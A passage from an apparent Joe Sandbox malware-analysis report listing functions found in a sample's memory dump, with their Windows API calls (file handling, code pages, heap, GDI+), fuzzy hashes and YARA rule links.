Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Ro
API String ID: 1269201914-1492261280
Opcode ID: f86773b0b9c5bc632b7ab7a698b1c42b78ec164a8909ea7e19b173ede86d6493
Instruction ID: 51913d465da280908683e35521b3b6303bad631c70af61443ba85eb895f97965
Opcode Fuzzy Hash: f86773b0b9c5bc632b7ab7a698b1c42b78ec164a8909ea7e19b173ede86d6493
Instruction Fuzzy Hash: DBB012C63AE1977C3104B2102E03C37831CC0C0B91330F02FF500DC191DC804C091871

Function 00DEBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00DEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00DEBA44,?), ref: 00DEB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00DEBA89,?,00000000), ref: 00DEBC64
GetCPInfo.KERNEL32(00000000,00DEBA89,?,?,?,00DEBA89,?,00000000), ref: 00DEBC77

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 7106b01c1158c493a90889d48a8a398fb89eac233e7295e2455943bd1cf87ab7
Instruction ID: 4c6de84a23d0133a87c8d061fbcaa9202d626b3564cf9708388a2808577d8bed
Opcode Fuzzy Hash: 7106b01c1158c493a90889d48a8a398fb89eac233e7295e2455943bd1cf87ab7
Instruction Fuzzy Hash: 5A5125709043959EDB20AF77C8816BBBBE5EF41320F28846FD4978B261D735A945CBB0

Function 00DC9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00DC9A50,?,?,00000000,?,?,00DC8CBC,?), ref: 00DC9BAB
GetLastError.KERNEL32(?,00000000,00DC8411,-00009570,00000000,000007F3), ref: 00DC9BB6

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 0a299f36968ef8cfca9ec01921122761edd474fde37a97ade4de4d752ca4a3e3
Instruction ID: f2bdd0c064cb267e138f654854ba284055ea84716556a28703850673ded9a1b0
Opcode Fuzzy Hash: 0a299f36968ef8cfca9ec01921122761edd474fde37a97ade4de4d752ca4a3e3
Instruction Fuzzy Hash: 8841AF71504342ABDB249F29E5A8E6AF7E6FFD4320F19892DE88183260D770ED458A71

Function 00DEBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00DE97E5: GetLastError.KERNEL32(?,00E01030,00DE4674,00E01030,?,?,00DE3F73,00000050,?,00E01030,00000200), ref: 00DE97E9
Part of subcall function 00DE97E5: _free.LIBCMT ref: 00DE981C
Part of subcall function 00DE97E5: SetLastError.KERNEL32(00000000,?,00E01030,00000200), ref: 00DE985D
Part of subcall function 00DE97E5: _abort.LIBCMT ref: 00DE9863

Part of subcall function 00DEBB4E: _abort.LIBCMT ref: 00DEBB80
Part of subcall function 00DEBB4E: _free.LIBCMT ref: 00DEBBB4

Part of subcall function 00DEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00DEBA44,?), ref: 00DEB7E6

_free.LIBCMT ref: 00DEBA9F
_free.LIBCMT ref: 00DEBAD5

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 7fb89513439a307d647fee082b2ff985100d211b0e04b02e3b326640a0fbe5ef
Instruction ID: 593451f2fa251186c2b77d7e073d77efc9325c60a21b1d7de15e75aa3112728c
Opcode Fuzzy Hash: 7fb89513439a307d647fee082b2ff985100d211b0e04b02e3b326640a0fbe5ef
Instruction Fuzzy Hash: 0D317731904289AFDB10FF56E441B6EB7F5EF40334F2540AAE5189B2A1EB716D40DB70

Function 00DC1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC1E55

Part of subcall function 00DC3BBA: __EH_prolog.LIBCMT ref: 00DC3BBF

_wcslen.LIBCMT ref: 00DC1EFD

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 642bc5c88bb448ba7e8d4c171c9b87d024cabf9842ee30bf62fe971f1beccf12
Instruction ID: 8bbdffd9319123e7ae02e5296979afeddcaed1d2418a70791a35278b713eae0c
Opcode Fuzzy Hash: 642bc5c88bb448ba7e8d4c171c9b87d024cabf9842ee30bf62fe971f1beccf12
Instruction Fuzzy Hash: AC31297590421AAACF15EF98C945AEEBBF6EF49300F24009EF445A7252C7325E04CB70

Function 00DC9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00DC73BC,?,?,?,00000000), ref: 00DC9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00DC9E70

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 2954a40a8b548c8e6f20c4715f67508f5f4738066ea97216df4f07d2ba0850dc
Instruction ID: 722e7d1bdc16c4a834b96274bfc3d775f2e212d16b948bad754cbecd96bb9b63
Opcode Fuzzy Hash: 2954a40a8b548c8e6f20c4715f67508f5f4738066ea97216df4f07d2ba0850dc
Instruction Fuzzy Hash: 4921CE31249286ABC714DF64C8A9FAAFBE8AF55304F08491DF4C687141D329EA0DDB71

Function 00DC966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00DC9F27,?,?,00DC771A), ref: 00DC96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00DC9F27,?,?,00DC771A), ref: 00DC9716

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 852ffb622911e19a7e8d88c0e2610514d7ec52e195aba2369d4841aab6556112
Instruction ID: ffc114dcc17759ac7b1e21d4a217856ac527b2e1432a2c460fc8f826702ae836
Opcode Fuzzy Hash: 852ffb622911e19a7e8d88c0e2610514d7ec52e195aba2369d4841aab6556112
Instruction Fuzzy Hash: 6C21ACB11403456EE2309A65C889FA7B7DCEB49325F044A1DFAD5C72D1C674A8848A71

Function 00DC9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00DC9EC7
GetLastError.KERNEL32 ref: 00DC9ED4

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: d2d1c85263b9697a820b87f24b441b5d6e83e99ec9c0a4dc62c74c82f86fd7c9
Instruction ID: e2371b3f6738c869924d9b2680a72f3dbc833044e01f81838b52870a1524064d
Opcode Fuzzy Hash: d2d1c85263b9697a820b87f24b441b5d6e83e99ec9c0a4dc62c74c82f86fd7c9
Instruction Fuzzy Hash: C311E070600302ABD724C628C859FA6F7ECAB45320F644A2DF492D36D0D7B0ED45C670

Function 00DE8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DE8E75

Part of subcall function 00DE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00DECA2C,00000000,?,00DE6CBE,?,00000008,?,00DE91E0,?,?,?), ref: 00DE8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00E01098,00DC17CE,?,?,00000007,?,?,?,00DC13D6,?,00000000), ref: 00DE8EB1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 6e3b33b023b06d84bc24b0219472b0ad5eeb95bdb34eedf33b84a9bea1b6edef
Instruction ID: adaf0aca8e30964aa6d7f7465bd5867bef0785d8bb1f7b4a9da749a296a82d55
Opcode Fuzzy Hash: 6e3b33b023b06d84bc24b0219472b0ad5eeb95bdb34eedf33b84a9bea1b6edef
Instruction Fuzzy Hash: D7F062326012966ADB213A279C05B6F7758CF81F70B6D4165F96CA6191DF62DD00B1B0

Function 00DD109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00DD10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00DD10B2

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 63d512e22583586d1ccc1f7d08771b9e14c1374a37f3461fcc2042dceb16608d
Instruction ID: face660c572b06d81968794c6188f7e9758d31db5818eb054a909b2e89c48671
Opcode Fuzzy Hash: 63d512e22583586d1ccc1f7d08771b9e14c1374a37f3461fcc2042dceb16608d
Instruction Fuzzy Hash: 29E0D876B00245B7CF099BB49C058FB73DEEA442443188177E403D3341F930EE418670

Function 00DCA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00DCA325,?,?,?,00DCA175,?,00000001,00000000,?,?), ref: 00DCA501

Part of subcall function 00DCBB03: _wcslen.LIBCMT ref: 00DCBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00DCA325,?,?,?,00DCA175,?,00000001,00000000,?,?), ref: 00DCA532

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 402b6cac5153c0e7bf092950ee0a2bb74747d01e4ad8cf0c5bc6977842293fb6
Instruction ID: 06b39d4baaf71be0bfc4cb82ffd063ab97f6b1cb8c779903e76c1b5ebd653c11
Opcode Fuzzy Hash: 402b6cac5153c0e7bf092950ee0a2bb74747d01e4ad8cf0c5bc6977842293fb6
Instruction Fuzzy Hash: 1EF0A93221020ABBDF016F64DC41FEA376CAF04389F488466B848D6260DB31CA98EA70

Function 00DCA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00DC977F,?,?,00DC95CF,?,?,?,?,?,00DF2641,000000FF), ref: 00DCA1F1

Part of subcall function 00DCBB03: _wcslen.LIBCMT ref: 00DCBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00DC977F,?,?,00DC95CF,?,?,?,?,?,00DF2641), ref: 00DCA21F

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 5842718727189bf74755b0b8f03e815773dc9d8b1d9c0b7dd09fb583e6a6fcdc
Instruction ID: e8845c72f1eab6e3c9ffb830372bf72ea588adce3c32b0b54e12a7e71eaf111d
Opcode Fuzzy Hash: 5842718727189bf74755b0b8f03e815773dc9d8b1d9c0b7dd09fb583e6a6fcdc
Instruction Fuzzy Hash: 73E0923114021E6BDB015F64DC45FEA775CAF08396F484026B944D6150EB61DE84DA74

Function 00DDAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00DF2641,000000FF), ref: 00DDACB0
CoUninitialize.COMBASE(?,?,?,?,00DF2641,000000FF), ref: 00DDACB5

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 1531b04d11d49522db17c729943de993c4c1cd7600e28b5e2d9ff80b95be8785
Instruction ID: 997fdf1d11a3262f179fff7507d0d6f04cd5fbb70e6db1eb81d9eb3f3788e6ed
Opcode Fuzzy Hash: 1531b04d11d49522db17c729943de993c4c1cd7600e28b5e2d9ff80b95be8785
Instruction Fuzzy Hash: EAE06D72604650EFCB10AB59DC06B59FBA8FB88B20F00426AF416D37A0CB74A941CAA4

Function 00DCA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00DCA23A,?,00DC755C,?,?,?,?), ref: 00DCA254

Part of subcall function 00DCBB03: _wcslen.LIBCMT ref: 00DCBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00DCA23A,?,00DC755C,?,?,?,?), ref: 00DCA280

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 9a24a1f3fc43568b6ab20f1bcb09241202cfca7b6decdef4af50db8d2338c4c4
Instruction ID: f82970c693fc1b13c4f82b202cf7d993f6785845548673f7b7fbecbf6aba642d
Opcode Fuzzy Hash: 9a24a1f3fc43568b6ab20f1bcb09241202cfca7b6decdef4af50db8d2338c4c4
Instruction Fuzzy Hash: C5E092325002286BCB50AB68DC09FE9B758EB083E5F044262FD44E7294DB70DE44CAF0

Function 00DDDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DDDEEC

Part of subcall function 00DC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC40A5

SetDlgItemTextW.USER32(00000065,?), ref: 00DDDF03

Part of subcall function 00DDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DDB579
Part of subcall function 00DDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DDB58A
Part of subcall function 00DDB568: IsDialogMessageW.USER32(00010466,?), ref: 00DDB59E
Part of subcall function 00DDB568: TranslateMessage.USER32(?), ref: 00DDB5AC
Part of subcall function 00DDB568: DispatchMessageW.USER32(?), ref: 00DDB5B6

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 88770f401480850e172aca753576793429b46eb1e1dcbb3691cc6e8c7e0f8f3e
Instruction ID: 7401fb231d22d72efef9134bd78c7cbc3462e40bb182d2c88c1de606e1ba7791
Opcode Fuzzy Hash: 88770f401480850e172aca753576793429b46eb1e1dcbb3691cc6e8c7e0f8f3e
Instruction Fuzzy Hash: EBE092B24103496ADF02AB65DC06F9E3B6C9B05785F040856B240EB1A3DA79EA558A71

Function 00DD081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DD0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DCF2D8,Crypt32.dll,00000000,00DCF35C,?,?,00DCF33E,?,?,?), ref: 00DD0858

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: c8ae9f156dd5f475293a238ddcc28a832c313f1653aafd6f0cad2fc916b80fed
Instruction ID: d50a930d6244d32244ea23087bfd18a903d94ee2c281bee0d2734e4918c8c9c0
Opcode Fuzzy Hash: c8ae9f156dd5f475293a238ddcc28a832c313f1653aafd6f0cad2fc916b80fed
Instruction Fuzzy Hash: FBE048764002586BDF11AB94DC09FDB7BACEF093D1F0440667645D6104DA74DA84CBF0

Function 00DDA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00DDA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00DDA3E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
